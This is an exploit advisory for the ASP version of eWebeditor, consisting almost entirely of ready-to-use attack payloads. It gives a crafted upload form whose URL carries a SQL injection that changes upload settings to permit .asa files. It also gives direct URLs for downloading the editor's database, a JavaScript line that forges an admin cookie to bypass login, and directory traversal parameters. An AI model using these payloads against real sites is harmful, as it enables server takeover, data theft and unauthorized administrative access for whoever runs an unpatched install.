1 #################################################################
2 # Application Info:
3 # Name: eWebeditor
4 # Version: ASP
5 #################################################################
6 Vulnerability:
7
8 =======================
9 Arbitrary File Upload
10 =======================
11 <form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye ’union select S_ID, S
_Name, S_Dir, S_CSS, [S_UploadDir]% 2b’ / .. / db ’, S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_Im
ageExt]% 2b’ | asa ’, S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S
_InitMode, S_BaseUrl from ewebeditor_style where s_name =’ standard ’and’a’ = ’a "method = post name = myform enctype
=" multipart / form−data ">
12 <p align="center">
13 <input type=file name=uploadfile size=100><br> <br>
14 <input type=submit value=Upload> </p>
15 </form>
16
17
18 =======================
19 Arbitrary File Upload 2
20 =======================
21 http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup
22
23
24 =======================
25 Database Disclosure
26 =======================
27 http://site.com/ewebeditor/db/ewebeditor.mdb
28
29
30 =======================
31 Administrator bypass
32 =======================
33 http://site.com/eWebEditor/admin/login.asp
34
35 put this code instead URL
36 javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
37
38
39 =======================
40 Directory Traversal
41 =======================
42 http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
43
44
45 =======================
46 Directory Traversal 2
47 =======================
48 http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..
Page 1/2
eWebeditor ASP Version Multiple Vulnerabilities
N/A
01/29/2010
49
Page 2/2
eWebeditor ASP Version Multiple Vulnerabilities
N/A
01/29/2010